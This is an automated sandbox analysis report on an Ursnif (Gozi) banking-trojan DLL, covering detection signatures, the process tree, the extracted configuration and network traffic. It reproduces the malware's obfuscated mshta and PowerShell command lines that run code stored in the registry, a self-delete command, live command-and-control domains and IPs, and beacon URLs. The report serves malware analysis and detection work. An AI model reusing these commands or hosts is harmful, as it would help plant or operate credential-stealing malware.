Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lokvQRcUe0

Overview

General Information

Sample Name:lokvQRcUe0 (renamed file extension from none to dll)
Analysis ID:634419
MD5:5de5e3440620950f0be99fc6728c7afe
SHA1:43cbdfe6773ce518847b89f177a555e6bece283b
SHA256:2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139
Tags:dllgozi_ifsb
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6352 cmdline: loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6360 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6380 cmdline: rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2388 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6356 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6644 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5580 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.4d994a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.4d994a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.2.rundll32.exe.4a10000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.543a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.54e6b48.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.313.107.42.1649743802033203 05/26/22-04:06:31.790854
                      SID:2033203
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3176.10.119.6849752802033204 05/26/22-04:06:53.058632
                      SID:2033204
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3176.10.119.6849752802033203 05/26/22-04:06:53.058632
                      SID:2033203
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: lokvQRcUe0.dllReversingLabs: Detection: 48%
                      Antivirus detection for URL or domain
                      Source: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/Avira URL Cloud: Label: phishing
                      Machine Learning detection for sample
                      Source: lokvQRcUe0.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A15FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04A15FBB
                      Source: lokvQRcUe0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.249261559.000000000040D000.00000002.00000001.01000000.00000003.sdmp, lokvQRcUe0.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_04F665C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_04F699BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_04F7BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_04F6FD47

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49743 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 176.10.119.68:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 176.10.119.68:80
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/
                      Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/
                      Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZ
                      Source: rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/IYp4CCs722tF8/P1aXeQdj/KbUVHJxkmyFlZHZ2qCybZpu/FgU09Slqdm/iq8FwKnV
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A11CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_04A11CA5
                      Source: global trafficHTTP traffic detected: GET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

